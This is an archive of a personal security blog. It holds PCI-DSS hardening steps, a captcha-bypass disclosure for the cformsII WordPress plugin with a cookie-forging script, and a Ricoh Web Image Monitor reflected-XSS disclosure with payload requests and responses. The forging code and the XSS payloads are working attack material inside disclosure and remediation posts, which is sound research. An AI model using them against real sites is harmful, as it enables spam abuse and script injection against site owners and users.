
Friday, 21 January 2011

Two must-haves for PCI-DSS

For better or worse, my life revolves around PCI-DSS these days. As I move along through the realm of PCI compliance, I thought I would start sharing some observations. I am going to start today with two standards that should be implemented to save you a lot of time and energy. If you have these in place before you start your vulnerability scanning, you won't have to deal with an avalanche of results from these issues.

1. Disable SSHv1 support. Version 1 of the SSH protocol is prone to a number of issues. For this reason, it has been essentially abandoned in favour of SSHv2. I have included instructions for disabling SSHv1 in a few of the more common setups.

   a. OpenSSH

      i. Edit the sshd_config file. This file is normally located in /etc/ssh/.
      ii. Change the line that reads "Protocol 1,2" so that it instead reads "Protocol 2".
      iii. Restart the sshd service.

   b. Cisco

      i. Enter the command "ip ssh version 2".
      ii. This will enable SSHv2 and disable SSHv1 when SSH is already configured.

   c. F5 BIG-IP 4.x

      i. Log in to the BIG-IP command line.
      ii. Change to the /config/ssh directory by typing the following command: cd /config/ssh
      iii. Use a text editor to edit the sshd_config file.
      iv. Edit the Protocol entry, which configures the SSH versions supported by the sshd daemon, by replacing "#Protocol 2,1" with "Protocol 2".
      v. Save the sshd_config file.
      vi. Restart sshd by typing the following command: bigstart restart sshd
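Before a scan, configs in the OpenSSH sshd_config format (used by both the OpenSSH and F5 setups above) can be audited with a short script. This is a minimal sketch of my own, assuming the simplified rule that the last uncommented Protocol directive wins and that OpenSSH defaults to protocol 2 when the directive is absent:

```python
def sshv1_enabled(config_text):
    """Return True if an sshd_config still permits SSH protocol 1.
    Simplified rule: the last uncommented 'Protocol' directive wins,
    and OpenSSH defaults to protocol 2 when the directive is absent."""
    protocols = "2"  # assumed default
    for line in config_text.splitlines():
        line = line.strip()
        if line.lower().startswith("protocol "):
            protocols = line.split(None, 1)[1]
    return "1" in protocols.replace(" ", "").split(",")

print(sshv1_enabled("Protocol 1,2\n"))  # True: SSHv1 still allowed
print(sshv1_enabled("Protocol 2\n"))    # False
```

Pointed at each host's sshd_config before the scan window, this flags the stragglers early.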

2. Enforce strong SSL encryption. There is a little more to this step than the previous one. Enforcing strong cryptographic standards in general is extremely important; right now we're just going to talk about how to enforce proper usage of SSL on IIS and Apache web servers.

   a. Apache 2.x

      i. Disable SSL 2.0 support.
      ii. Disable weak ciphers.
      iii. Disable MD5 hashing for MACs.
      iv. Disable null authentication.
      v. To accomplish this, include the following lines in the httpd.conf file:

         SSLProtocol -ALL +SSLv3 +TLSv1
         SSLCipherSuite ALL:!aNULL:!ADH:!eNULL:!LOW:!MD5:!EXP:RC4+RSA:+HIGH:+MEDIUM

   b. Windows/IIS

      i. Enforce the use of SSL 3.0 and TLS by disabling support for PCT 1.0 and SSL 2.0:

         1. Find HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\PCT 1.0\Server in the registry.
         2. Add a new DWORD value called "Enabled" and set it to 0x00000000.
         3. Find HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\SSL 2.0\Server.
         4. Add a new DWORD value called "Enabled" and set it to 0x00000000.

      ii. Disable all weak (less than 128-bit) ciphers by adding a DWORD value called "Enabled", set to 0x00000000, to each of the following keys:

         1. SCHANNEL\Ciphers\RC4 128/128
         2. SCHANNEL\Ciphers\RC2 128/128
         3. SCHANNEL\Ciphers\RC4 64/128
         4. SCHANNEL\Ciphers\RC4 56/128
         5. SCHANNEL\Ciphers\RC2 56/128
         6. SCHANNEL\Ciphers\RC4 40/128
         7. SCHANNEL\Ciphers\RC2 40/128
         8. SCHANNEL\Ciphers\NULL

      iii. Add a DWORD value called "Enabled", set to 0xffffffff, to the following keys:

         1. SCHANNEL\Ciphers\DES 56/56
         2. SCHANNEL\Ciphers\Triple DES 168/168
         3. SCHANNEL\KeyExchangeAlgorithms\PKCS

      iv. Enforce the use of SHA hashes instead of MD5:

         1. Add a DWORD value called "Enabled", set to 0x00000000, to SCHANNEL\Hashes\MD5.
         2. Add a DWORD value called "Enabled", set to 0xffffffff, to SCHANNEL\Hashes\SHA.

      v. A reboot of the machine is now required for the changes to take effect.
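Editing that many registry keys by hand is error-prone. One option is to render the whole set as a .reg file so it can be reviewed and imported in one step; the helper below is a sketch of my own (not an official tool), and importing the file creates any SCHANNEL subkeys that do not yet exist:

```python
# Sketch: render the SCHANNEL hardening above as a .reg file for review.
BASE = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL"

def schannel_reg(settings):
    """Render 'Enabled' DWORD settings as .reg text. 'settings' maps a
    subkey (relative to SCHANNEL) to True (0xffffffff) or False (0x0)."""
    lines = ["Windows Registry Editor Version 5.00", ""]
    for subkey, enabled in settings.items():
        lines.append("[%s\\%s]" % (BASE, subkey))
        lines.append('"Enabled"=dword:%08x' % (0xFFFFFFFF if enabled else 0))
        lines.append("")
    return "\n".join(lines)

print(schannel_reg({
    r"Protocols\PCT 1.0\Server": False,
    r"Protocols\SSL 2.0\Server": False,
    r"Ciphers\NULL": False,
    r"Hashes\MD5": False,
    r"Hashes\SHA": True,
}))
```

Save the output as hardening.reg, eyeball it, then import it on each IIS box before rebooting.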

These two little things can save you a huge amount of work if you implement them. When you go to run a PCI-DSS-mandated vulnerability scan, these items will trip you up if you're not careful. Get them implemented early, set them as a standard, and save yourself a lot of headaches.

Wednesday, 15 December 2010

cformsII CAPTCHA Bypass Vulnerability

The cformsII plugin for WordPress contains a vulnerability in its captcha verification functionality. This vulnerability exists due to an inherent trust of user-controlled input. An attacker could utilise it to completely bypass the captcha security mechanism on any WordPress form created with this plugin.

Captcha Generation:
cformsII generates its captcha by randomly selecting characters from the set a-k, m, n, p-z, and 2-9. I assume that the letters l and o, and the numerals 1 and 0, were excluded to avoid any confusion when rendered as an image. It selects a random number of these characters, based on preset minimum and maximum limits, and assembles them into a string. It then creates an MD5 hash of this string, prepends 'i+' to the hash, and sets the result as a cookie called 'turing_string_' (suffixed with the form number). See the code excerpts below:
----------------------
$min = prep( $_REQUEST['c1'],4 );
$max = prep( $_REQUEST['c2'],5 );
$src = prep( $_REQUEST['ac'], 'abcdefghijkmnpqrstuvwxyz23456789');
----------------------

### captcha random code
$srclen = strlen($src)-1;
$length = mt_rand($min,$max);

$turing = '';
for($i=0; $i<$length; $i++)
$turing .= substr($src, mt_rand(0, $srclen), 1);

$tu = ($_REQUEST['i']=='i')?strtolower($turing):$turing;

setcookie('turing_string_'.$no, $_REQUEST['i'].'+'.md5($tu),(time()+60*60*5),"/");
--------------------------

This cookie is set when the user is presented with the generated captcha image. When they submit their completed form, the captcha code is submitted in a POST parameter titled 'cforms_captcha'. This parameter is then MD5-hashed and compared to the MD5 value from the turing_string_ cookie. If the two hashes match, the submission is considered valid.

-------------------------
else if( $field_type == 'captcha' ){  ### captcha verification

         $validations[$i+$off] = 1;

$a = explode('+',$_COOKIE['turing_string_'.$no]);

$a = $a[1];
$b = md5( ($captchaopt['i'] == 'i')?strtolower($_REQUEST['cforms_captcha'.$no]):$_REQUEST['cforms_captcha'.$no]);

if ( $a <> $b ) {
$validations[$i+$off] = 0;
$err = !($err)?2:$err;
}

}
-----------------------

The end result is that an attacker can pre-select a 'valid' captcha string. They then take the MD5 hash of that string, prepend "i%2b" (the URL-encoded 'i+') to the value, and set that as the turing_string_ cookie for their POST requests. Every request sent with this parameter and cookie combination will be inherently trusted as valid from the captcha standpoint.
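As a sketch of the attack (in Python rather than the plugin's PHP, and with a function name of my own), the forged cookie value can be built like this, mimicking the plugin's case-insensitive 'i' mode:

```python
import hashlib
from urllib.parse import quote

def forged_turing_cookie(chosen_code, form_no=""):
    """Build a turing_string_ cookie value the plugin will accept for an
    attacker-chosen captcha answer: the server only compares
    md5(submitted answer) against the hash it reads back from this
    client-controlled cookie."""
    digest = hashlib.md5(chosen_code.lower().encode()).hexdigest()
    # 'i+<md5>' URL-encodes to 'i%2B<md5>' for the Cookie header
    return "turing_string_%s=%s" % (form_no, quote("i+" + digest))

print(forged_turing_cookie("abcd", "1"))
```

The matching POST then simply sends the chosen code in the cforms_captcha parameter for the same form number, and validation passes every time.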

The problem here is twofold. The first issue is that the captcha codes are not one-time-use codes, as they should be. So even without tricking the captcha system in the first place, it would be possible to launch a replay attack against this system to generate large numbers of submissions. Each captcha code should only be valid for a single use, and only during a very limited time window.

The second problem is the trust of user-supplied data. The process is meant to validate one piece of entered data against another. However, both pieces of data are freely offered up to the client side for tampering. This completely negates the verification process, as the server side is not truly in control of the validation at this point.

The take-away:
Storing captcha data in cookies and then comparing it against user-supplied input is not an appropriate method of validation, for a number of reasons. The captcha code, whether in raw or hashed form, should be stored server-side for validation, should be valid for only one use, and should be valid only for a limited timeframe. This could be done using an in-memory array, a database, or even a flat file.
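A minimal sketch of that server-side approach, using an in-memory dict (class and method names are illustrative; a real deployment would use the plugin's database or other shared storage):

```python
import hashlib
import secrets
import time

class CaptchaStore:
    """Captcha codes held server-side: hashed, time-limited, single-use."""

    def __init__(self, ttl=300):
        self.ttl = ttl              # validity window in seconds
        self._pending = {}          # token -> (md5 of code, issue time)

    def issue(self, code):
        """Store a freshly generated code; return an opaque token for the
        session. Only the token ever reaches the client."""
        token = secrets.token_hex(16)
        self._pending[token] = (hashlib.md5(code.encode()).hexdigest(), time.time())
        return token

    def validate(self, token, answer):
        """Check an answer; the code is consumed whether or not it matches."""
        entry = self._pending.pop(token, None)   # single use, replay-proof
        if entry is None:
            return False
        digest, issued = entry
        if time.time() - issued > self.ttl:
            return False
        return hashlib.md5(answer.encode()).hexdigest() == digest
```

Because the client only ever holds an opaque token, there is nothing to tamper with, and popping the entry on first use kills the replay attack described above.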

Tuesday, 9 November 2010

Ricoh Web Image Monitor 2.03 Reflected XSS Vuln

I was poking at some Ricoh MFPs several days ago when I found this. It is nothing to get too terribly excited about, as it's just a reflected XSS. However, the ability to abuse any trusted internal IP should be treated as a threat; companies have taken big hits from less. So, without further ado, here are the petty little details:

Fun with Redirects:
My initial test simply abused the redirect functionality that serves as the injection vector.
GET /?";location.href="http://cosine-security.blogspot.com HTTP/1.1

HTTP/1.0 200 OK
Date: Tue, 09 Nov 2010 17:58:00 GMT
Server: Web-Server/3.0
Content-Type: text/html; charset=UTF-8
Content-Length: 683
Expires: Tue, 09 Nov 2010 17:58:00 GMT
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: cookieOnOffChecker=on; path=/
Connection: close

<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="refresh" content="1; URL=/web/guest/en/websys/webArch/message.cgi?messageID=MSG_JAVASCRIPTOFF&buttonURL=/../../../">
<meta http-equiv="Cache-Control" content="no-cache">
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Expires" content="-1">
<title>Web Image Monitor</title>
<script language="javascript">
<!--
function jumpPage(){
self.document.cookie="cookieOnOffChecker=on; path=/";
location.href="/web/guest/en/websys/webArch/mainFrame.cgi?";location.href="http://cosine-security.blogspot.com";
}
// -->
</script>
</head>
<body onLoad="jumpPage()"></body>
</html>


A more traditional XSS test still works just as well, of course:

Traditional Test:
GET /?--></script><script>alert(51494)</script> HTTP/1.1


HTTP/1.0 200 OK
Date: Fri, 29 Oct 2010 17:43:19 GMT
Server: Web-Server/3.0
Content-Type: text/html; charset=UTF-8
Content-Length: 672
Expires: Fri, 29 Oct 2010 17:43:19 GMT
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: cookieOnOffChecker=on; path=/
Connection: close

<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="refresh" content="1; URL=/web/guest/en/websys/webArch/message.cgi?messageID=MSG_JAVASCRIPTOFF&buttonURL=/../../../">
<meta http-equiv="Cache-Control" content="no-cache">
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Expires" content="-1">
<title>Web Image Monitor</title>
<script language="javascript">
<!--
function jumpPage(){
self.document.cookie="cookieOnOffChecker=on; path=/";
location.href="/web/guest/en/websys/webArch/mainFrame.cgi?--></script><script>alert(51494)</script>";
}
// -->
</script>
</head>
<body onLoad="jumpPage()"></body>
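When checking a batch of devices for this issue, the manual test above can be scripted. This sketch (the function name is mine) only checks whether the payload comes back verbatim in a captured response body; it is not a general XSS scanner:

```python
# The raw payload from the request above
PAYLOAD = '--></script><script>alert(51494)</script>'

def reflects_unescaped(body, payload=PAYLOAD):
    """Crude check for this issue: does the payload come back verbatim
    (unencoded) in a captured response body? If the device had HTML-
    encoded it, the string would not match."""
    return payload in body

# e.g. the vulnerable line from the response above:
line = 'location.href="/web/guest/en/websys/webArch/mainFrame.cgi?--></script><script>alert(51494)</script>";'
print(reflects_unescaped(line))  # True
```

Feed it the body of each printer's response to the crafted GET and you get a quick yes/no per host.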

Saturday, 26 June 2010

Tavis Ormandy's Full Disclosure: Just the facts ma'am

Everybody has been talking about Tavis Ormandy's disclosure of a Windows Help Centre vulnerability. There has been very heated debate going around; in some cases the word debate is a little generous. There has been a lot of name calling, mud slinging, and general ad hominem nonsense. People are trashing Tavis, Microsoft, and even Robert Hansen now. It's gotten a little out of hand. What I have noticed is a lack of real substantiated facts in these arguments. To that end, I have made an effort to contact both involved parties, Tavis Ormandy and the MSRC. I am hoping that they will be willing to respond with some of the facts surrounding this occurrence, and maybe we'll hear a little bit of tempered truth instead of everyone's emotionally charged bickering. Of course, the chances that either Tavis or the MSRC will be bothered to respond to me are probably not great, but here's hoping.

UPDATE: I have heard back from Mr. Ormandy. He was very polite, but has stated that he would prefer to let the issue rest rather than answer any more questions. Since I am unable to present his side of the argument, even if I were to hear back from Microsoft, I would feel it impossible to present an unbiased view here. Therefore, I shall just let it drop. Perhaps that is really what we all need to do. If you think he was right, then silently cheer him on; if you think he was wrong, admit that maybe he made a mistake, and move on.

Friday, 23 April 2010

NetSparker Community Edition Review

For those of you who do not follow DarkNET, it is a well-run blog where they add their perspective on security news and events. They also post a never-ending stream of new tools and updates, and they are a great resource for keeping up to date on the latest toys and tools. They have come through for me once again by introducing me to Netsparker Community Edition. The last fire-and-forget web scanner I was enticed to check out in this manner was a horrible flop. It was called Acunetix; perhaps you've heard of it? If you haven't, don't bother, it's rubbish.

So, as you can imagine, I was not expecting great things from Netsparker. However, as I was downloading it I noticed that RSnake had also posted about it. Like many people in my field, I tend to have an ego, but when RSnake speaks, I listen. So I installed the Community Edition and gave it a quick run-through. As expected, many of the best features are turned off in the freebie version, but that's okay. They left enough good stuff in there to whet my appetite (good job, marketing guys). So here are the things I noticed right off the bat:

  1. The user interface is very simple and straightforward. This is usually my first indication of a problem. In my experience, good products in this space tend to have absolutely wretched interfaces: tormented things that will try to bend your mind to their will and subjugate you completely. The interface here is so simple that almost anyone could walk through setting up a scan.
  2. The user interface makes sense. Acunetix is a perfect example of a simplistic but terrible user interface: very simple, but anything but straightforward. Trying to understand how to make it do some of the things you'd like it to do is not an easy task. Netsparker does not suffer these issues. It presents you with almost everything you could possibly need and, even more importantly, nothing you don't.
  3. The sucker is FAST. I typically use IBM's Rational AppScan product. While AppScan is a good product, fast is never an adjective I would use to describe it. Netsparker is fast. Now, part of why it is so fast is that the test profile is so limited in the Community Edition, so let's just look at the crawler. A 964-URL site took AppScan just over an hour to crawl; Netsparker did it in 15 minutes, then ran all of its tests in another 20-30 minutes. It may be that we will see these speeds drop dramatically with the full version, due to the expanded test profile.
  4. SQLi right away. One of the apps I tested it on had SQL injection right on the login page. AppScan had failed to detect it, but manual testing revealed it inside 10 minutes. Netsparker caught it immediately. While this is far from a comprehensive look at its detection rates, I say bravo to Netsparker.
  5. Thoroughness. This is hard to gauge because it is the limited version. It FEELS like it is not very thorough. Part of this is psychological, because it runs so fast; part of it is that some things go unfound simply because it is the Community Edition. I can't shake the feeling that it is not being thorough, but I would really have to test the full version to make any honest assessment of this.
  6. No false positives, sorta. I performed several test scenarios, and it did not really generate false positives. The ambiguous language here is due to what I think is a very neat feature: on one of the test sites I saw a distinction in the results between 'we know there is cross-site scripting' and 'we think there might be'. I appreciate that it is extremely difficult to eliminate false positives, and I think this approach is great.
  7. Testing framework. I have talked about this before, and I will talk about it again: we need to see testing harnesses, not just scanners. Once you are done with a scan in Netsparker, it has tools you can use within the app to attempt to exploit the vulnerabilities. If you find a possible SQLi, there is an actual injection tool built into the scanner to let you try to exploit it. It has similar tools for LFI and command injection. This, to my mind, represents the absolute right direction for these types of products to be heading in.
  8. Price tag. The Community Edition is free but limited. They then have two unlocked versions, Standard and Enterprise, the key difference being the number of sites licensed for. I'm not sure if this means you predefine what sites you are licensed for or not. However, the unlimited Enterprise Edition comes with a price tag of only $3000, which is extremely reasonable in my opinion. It also makes the product worthwhile even as a second scanner. I am considering recommending we purchase an Enterprise license so that we can have two scanners, to see if we catch anything with one that we don't with the other.
So let me summarize briefly. The Community Edition of Netsparker shows some very significant promise, and would seem to indicate a well-thought-out and well-developed product. However, for professional assessments I would definitely recommend you not try to use the Community Edition. Without having tested the Enterprise Edition, I won't recommend it outright, but at a price tag of only $3000, it seems like a good idea.

Netsparker Community edition is created by Mavituna Security, and can be downloaded here.

Monday, 8 March 2010

This is just sad

So I was taking a poke at a friend's server, doing a preliminary sweep for them. I noticed that they were running FileZilla 0.9.33, so I did a quick Google search for "filezilla 0.9.33 vuln". What I came up with scared me a little bit. It wasn't that I found some huge gaping vulnerability, but rather a level of ignorance from one of FileZilla's forum admins that was simply astounding. You can see the forum thread here, and find the CVE for the vulnerability being discussed here. The vulnerability being discussed is an information disclosure in the getcwd() function.

The site admin, botg, replies, "What is FTP getcwd()? There's no such thing". Botg seems to think that this posting is about misuse of an FTP protocol command. He is then presented, by another user, with the CVE for this vulnerability. He then replies, "Thank you, I know how to use Google. Doesn't change the fact that there's no such thing as FTP getcwd(), whatever that means". This is the statement that, more than anything else, blows me away.

In the scan results the original user posted, it says:
Details: The FTP daemon exhibits a descriptor leak in the getcwd (get current working directory) function.
Extra info: None.
Fix: Upgrade your libc C library to the current version.
And in botg's reply, he even includes the function brackets when referring to getcwd. Funny, botg, that sure looks like a programming function call, now doesn't it? His snarky reply even sows the seeds of his own demise: "I know how to use Google". Oh really? Let me help you out. As the first link describes the C function getcwd(), I would say you seem to have some problems using Google after all. I would also say that you obviously have no understanding of how software vulnerabilities happen. If you think that vulnerabilities happen by some command the user can just type in to "hack the gibson", you need to stop watching TV, mate. "It's not my job to know these things," you might say. No, but you are in the position of helping users, and this one came to you with a question. Rather than doing any decent amount of research, you opened your mouth and inserted your foot. Let's forget the whole Google bit, or the fact that it is immediately obvious that this is a C function call. I once again point you to the scan results the user posted:

Fix: Upgrade your libc C library to the current version.

Hrm, I wonder if that might provide a clue as to what's going on here? If this is the level of support a FileZilla user can expect, I feel very sorry for them.

Update: I decided to register for their forums so I could post some useful advice to this thread. I would take the high road, instead of just sitting back and being snarky myself. Imagine my surprise when my confirmation email came in to activate my account, and my username and password were both on it in plaintext... uggggg. These people make me want to cry!

Wednesday, 3 March 2010

Lessons Learned: Self-referencing local file includes...

So I had a small incident at work today. I found a Perl CGI script that had a local file include/OS command injection vulnerability. After confirming the vulnerability, I decided to try to pull the source code of the vulnerable script, and the system choked. When I went to try something else, I was greeted by an ugly Apache 500 server error. At first I just frowned and went back to a command string I had already validated as working. 500 error again. Apparently something in the mix (I am unsure if it was Apache itself, mod_perl, or a condition created at the OS level) did not like the script trying to read itself and return its contents back out through Apache. I suppose you could class this as an inadvertent denial-of-service attack.
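The lesson can be captured in a trivial guard for future tests. This sketch (names are hypothetical, and it's Python rather than the Perl target) just drops the vulnerable script's own path from a list of LFI read targets before probing:

```python
def lfi_targets(candidates, vulnerable_script):
    """Filter candidate include paths, dropping any that would make the
    vulnerable script read itself, which (as above) can wedge the server."""
    return [p for p in candidates if not p.endswith(vulnerable_script)]

print(lfi_targets(["/etc/passwd", "/var/www/cgi-bin/form.cgi"], "form.cgi"))
# ['/etc/passwd']
```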